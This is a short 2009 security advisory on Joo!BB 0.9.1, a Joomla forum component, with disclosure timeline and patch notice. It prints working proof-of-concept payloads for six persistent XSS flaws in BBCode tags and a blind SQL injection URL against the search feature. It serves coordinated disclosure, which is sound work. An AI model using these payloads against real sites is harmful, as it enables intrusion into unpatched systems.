Saturday, 01 August 2009 00:00

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]
  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched and users are strongly urged to update to 0.9.1 Patch 1

Timeline

  • Vulnerabilities Discovered: 26 July 2009
  • Vendor Notified: 27 July 2009
  • Vendor Response: 29 July 2009
  • Update Available: 01 August 2009
  • Disclosure: 01 August 2009
Last Updated on Thursday, 30 September 2010 17:39
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions